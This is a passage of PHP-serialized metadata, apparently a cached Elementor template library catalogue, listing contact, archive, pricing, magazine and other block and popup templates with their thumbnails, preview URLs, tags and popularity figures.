9\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/02/contact_white_2.png\";s:12:\"tmpl_created\";i:1520443298;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blocks/contact-9/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"contact\";s:4:\"tags\";s:11:\"[\"contact\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:104;s:11:\"trend_index\";i:82;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:298;a:14:{s:2:\"id\";i:8961;s:5:\"title\";s:9:\"archive 1\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/06/Archive_350.1.jpg\";s:12:\"tmpl_created\";i:1528639909;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blocks/archive-1/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:94;s:11:\"trend_index\";i:105;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:299;a:14:{s:2:\"id\";i:4468;s:5:\"title\";s:9:\"Contact 7\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/02/contact_white_3.png\";s:12:\"tmpl_created\";i:1520443301;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blocks/contact-7/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"contact\";s:4:\"tags\";s:18:\"[\"contact\",\"form\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:133;s:11:\"trend_index\";i:96;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:300;a:14:{s:2:\"id\";i:8969;s:5:\"title\";s:9:\"archive 2\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/06/Archive_350.2.jpg\";s:12:\"tmpl_created\";i:1528700014;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blocks/archive-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:252;s:11:\"trend_index\";i:496;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:301;a:14:{s:2:\"id\";i:12716;s:5:\"title\";s:30:\"Magazine &#8211; Single Post 3\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2020/01/Post4_s.png\";s:12:\"tmpl_created\";i:1579060659;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:121:\"https://library.elementor.com/blocks/magazine-single-post-3-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:19:\"[\"Blog\",\"Magazine\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:536;s:11:\"trend_index\";i:396;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:302;a:14:{s:2:\"id\";i:4476;s:5:\"title\";s:10:\"Contact 15\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/02/contact_white_4.png\";s:12:\"tmpl_created\";i:1520443303;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/blocks/contact-15/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"contact\";s:4:\"tags\";s:18:\"[\"contact\",\"form\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:234;s:11:\"trend_index\";i:244;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:303;a:14:{s:2:\"id\";i:8973;s:5:\"title\";s:9:\"archive 3\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/06/Archive_350.3.jpg\";s:12:\"tmpl_created\";i:1528700205;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blocks/archive-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:188;s:11:\"trend_index\";i:215;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:304;a:14:{s:2:\"id\";i:12707;s:5:\"title\";s:30:\"Magazine &#8211; Single Post 3\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2020/01/Post1_s.png\";s:12:\"tmpl_created\";i:1579060669;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/blocks/magazine-single-post-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:19:\"[\"Blog\",\"Magazine\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:512;s:11:\"trend_index\";i:330;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:305;a:14:{s:2:\"id\";i:4484;s:5:\"title\";s:9:\"Contact 8\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/02/contact_black_3.png\";s:12:\"tmpl_created\";i:1520443305;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blocks/contact-8/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"contact\";s:4:\"tags\";s:18:\"[\"contact\",\"form\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:324;s:11:\"trend_index\";i:397;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:306;a:14:{s:2:\"id\";i:8977;s:5:\"title\";s:9:\"archive 4\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/06/Archive_350.4.jpg\";s:12:\"tmpl_created\";i:1528700326;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blocks/archive-4/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:349;s:11:\"trend_index\";i:490;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:307;a:14:{s:2:\"id\";i:12699;s:5:\"title\";s:30:\"Magazine &#8211; Single Post 2\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2020/01/Post3_s.png\";s:12:\"tmpl_created\";i:1579060680;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/blocks/magazine-single-post-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:19:\"[\"Blog\",\"Magazine\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:408;s:11:\"trend_index\";i:269;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:308;a:14:{s:2:\"id\";i:4492;s:5:\"title\";s:9:\"Contact 5\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/02/map_white_3.png\";s:12:\"tmpl_created\";i:1520443307;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/blocks/contact-5-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"contact\";s:4:\"tags\";s:11:\"[\"contact\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:38;s:11:\"trend_index\";i:23;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:309;a:14:{s:2:\"id\";i:8981;s:5:\"title\";s:9:\"archive 5\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/06/Archive_350.5.jpg\";s:12:\"tmpl_created\";i:1528700484;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blocks/archive-5/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:321;s:11:\"trend_index\";i:393;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:310;a:14:{s:2:\"id\";i:12688;s:5:\"title\";s:30:\"Magazine &#8211; Single Post 1\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2020/01/Post2_s.png\";s:12:\"tmpl_created\";i:1579060692;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/blocks/magazine-single-post-1/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:19:\"[\"Blog\",\"Magazine\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:400;s:11:\"trend_index\";i:243;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:311;a:14:{s:2:\"id\";i:4500;s:5:\"title\";s:9:\"Pricing 7\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/02/price_white_1.png\";s:12:\"tmpl_created\";i:1520443308;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blocks/pricing-7/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"pricing\";s:4:\"tags\";s:11:\"[\"pricing\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:469;s:11:\"trend_index\";i:481;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:312;a:14:{s:2:\"id\";i:8985;s:5:\"title\";s:9:\"archive 6\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/06/Archive_350.6.jpg\";s:12:\"tmpl_created\";i:1528700612;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blocks/archive-6/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:211;s:11:\"trend_index\";i:250;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:313;a:14:{s:2:\"id\";i:12678;s:5:\"title\";s:23:\"Magazine &#8211; Header\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2020/06/Header-magazine.png\";s:12:\"tmpl_created\";i:1579060701;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/magazine-header/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:28:\"[\"Blog\",\"header\",\"Magazine\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:313;s:11:\"trend_index\";i:240;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:314;a:14:{s:2:\"id\";i:4509;s:5:\"title\";s:9:\"Pricing 1\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/02/price_black_1.png\";s:12:\"tmpl_created\";i:1520443310;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blocks/pricing-1/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"pricing\";s:4:\"tags\";s:11:\"[\"pricing\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:652;s:11:\"trend_index\";i:687;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:315;a:14:{s:2:\"id\";i:8989;s:5:\"title\";s:9:\"archive 7\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/06/Archive_350.7.jpg\";s:12:\"tmpl_created\";i:1528701063;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blocks/archive-7/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:205;s:11:\"trend_index\";i:290;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:316;a:14:{s:2:\"id\";i:12669;s:5:\"title\";s:23:\"Magazine &#8211; Footer\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2020/01/Footer_s.png\";s:12:\"tmpl_created\";i:1579060715;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/magazine-footer/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:28:\"[\"Blog\",\"footer\",\"Magazine\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:463;s:11:\"trend_index\";i:336;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:317;a:14:{s:2:\"id\";i:4521;s:5:\"title\";s:9:\"Pricing 8\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/02/price_white_2.png\";s:12:\"tmpl_created\";i:1520443312;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blocks/pricing-8/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"pricing\";s:4:\"tags\";s:11:\"[\"pricing\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:310;s:11:\"trend_index\";i:344;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:318;a:14:{s:2:\"id\";i:8996;s:5:\"title\";s:9:\"archive 8\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/06/Archive_350.8.jpg\";s:12:\"tmpl_created\";i:1528701290;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blocks/archive-8/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:215;s:11:\"trend_index\";i:452;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:319;a:14:{s:2:\"id\";i:12661;s:5:\"title\";s:23:\"Magazine &#8211; Search\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2020/01/Search_s.png\";s:12:\"tmpl_created\";i:1579060722;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/magazine-search/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:19:\"[\"Blog\",\"Magazine\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:443;s:11:\"trend_index\";i:214;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:320;a:14:{s:2:\"id\";i:4529;s:5:\"title\";s:9:\"Pricing 2\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/02/price_black_2.png\";s:12:\"tmpl_created\";i:1520443314;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blocks/pricing-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"pricing\";s:4:\"tags\";s:11:\"[\"pricing\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:568;s:11:\"trend_index\";i:553;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:321;a:14:{s:2:\"id\";i:9001;s:5:\"title\";s:9:\"archive 9\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/06/Archive_350.9.jpg\";s:12:\"tmpl_created\";i:1528701433;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blocks/archive-9/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:267;s:11:\"trend_index\";i:429;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:322;a:14:{s:2:\"id\";i:12652;s:5:\"title\";s:17:\"Magazine- Archiv2\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2020/01/Archiv2_s.png\";s:12:\"tmpl_created\";i:1579060730;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/blocks/magazine-archiv2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:19:\"[\"Blog\",\"Magazine\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:525;s:11:\"trend_index\";i:516;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:323;a:14:{s:2:\"id\";i:4537;s:5:\"title\";s:9:\"Pricing 9\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/02/price_white_3.png\";s:12:\"tmpl_created\";i:1520443315;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blocks/pricing-9/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"pricing\";s:4:\"tags\";s:11:\"[\"pricing\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:538;s:11:\"trend_index\";i:562;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:324;a:14:{s:2:\"id\";i:9119;s:5:\"title\";s:10:\"footer 015\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2018/07/Footer_GetStarted_350.png\";s:12:\"tmpl_created\";i:1532428138;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:101:\"https://library.elementor.com/blocks/demo/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:253;s:11:\"trend_index\";i:266;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:325;a:14:{s:2:\"id\";i:12643;s:5:\"title\";s:24:\"Magazine &#8211; Archiv1\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2020/01/Archiv1_s.png\";s:12:\"tmpl_created\";i:1579060737;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/blocks/magazine-archiv1/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:19:\"[\"Blog\",\"Magazine\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:386;s:11:\"trend_index\";i:287;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:326;a:14:{s:2:\"id\";i:4545;s:5:\"title\";s:9:\"Pricing 3\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/02/price_black_3.png\";s:12:\"tmpl_created\";i:1520443317;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blocks/pricing-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"pricing\";s:4:\"tags\";s:11:\"[\"pricing\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:648;s:11:\"trend_index\";i:658;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:327;a:14:{s:2:\"id\";i:9127;s:5:\"title\";s:9:\"header 13\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2018/07/Header_get_started_1200V3.png\";s:12:\"tmpl_created\";i:1532428699;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blocks/header-13/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:60;s:11:\"trend_index\";i:106;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:328;a:14:{s:2:\"id\";i:12635;s:5:\"title\";s:20:\"Magazine &#8211; 404\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2020/01/404_s.png\";s:12:\"tmpl_created\";i:1579060746;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:109:\"https://library.elementor.com/blocks/magazine-404/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:25:\"[\"404\",\"Blog\",\"Magazine\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:611;s:11:\"trend_index\";i:528;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:329;a:14:{s:2:\"id\";i:4553;s:5:\"title\";s:10:\"Pricing 10\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/02/price_white_4.png\";s:12:\"tmpl_created\";i:1520443319;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/blocks/pricing-10/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"pricing\";s:4:\"tags\";s:11:\"[\"pricing\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:482;s:11:\"trend_index\";i:453;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:330;a:14:{s:2:\"id\";i:12736;s:5:\"title\";s:41:\"Slide In | Contact Us | Magazine and Blog\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2020/01/PopUp_contact_s.png\";s:12:\"tmpl_created\";i:1579060978;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/popups/slide-in-contact-us/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:19:\"[\"Blog\",\"Magazine\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:691;s:11:\"trend_index\";i:670;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:331;a:14:{s:2:\"id\";i:4562;s:5:\"title\";s:9:\"Pricing 4\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/02/price_black_4.png\";s:12:\"tmpl_created\";i:1520443322;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blocks/pricing-4/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"pricing\";s:4:\"tags\";s:11:\"[\"pricing\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:636;s:11:\"trend_index\";i:709;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:332;a:14:{s:2:\"id\";i:12726;s:5:\"title\";s:52:\"Classic | Newsletter | Subscribe | Magazine and Blog\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2020/01/PopUp_Newsletter_s.png\";s:12:\"tmpl_created\";i:1579061019;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:143:\"https://library.elementor.com/popups/classic-newsletter-subscribe-magazine-and-blog/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:19:\"[\"Blog\",\"Magazine\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:417;s:11:\"trend_index\";i:274;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:333;a:14:{s:2:\"id\";i:4572;s:5:\"title\";s:10:\"Pricing 11\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/02/price_white_5.png\";s:12:\"tmpl_created\";i:1520443324;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/blocks/pricing-11/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"pricing\";s:4:\"tags\";s:11:\"[\"pricing\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:308;s:11:\"trend_index\";i:310;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:334;a:14:{s:2:\"id\";i:9174;s:5:\"title\";s:17:\"single product 01\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2018/07/single_product01_350.png\";s:12:\"tmpl_created\";i:1532950125;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/single-product-01/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:14:\"single product\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:44;s:11:\"trend_index\";i:16;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:335;a:14:{s:2:\"id\";i:13089;s:5:\"title\";s:23:\"Photography &#8211; 404\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2020/02/404_s.png\";s:12:\"tmpl_created\";i:1582091623;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/photography-404/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:33:\"[\"404\",\"Photography\",\"portfolio\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:681;s:11:\"trend_index\";i:580;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:336;a:14:{s:2:\"id\";i:4580;s:5:\"title\";s:10:\"Pricing 12\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/02/price_white_6.png\";s:12:\"tmpl_created\";i:1520443326;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/blocks/pricing-12/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"pricing\";s:4:\"tags\";s:11:\"[\"pricing\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:537;s:11:\"trend_index\";i:588;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:337;a:14:{s:2:\"id\";i:9178;s:5:\"title\";s:17:\"single product 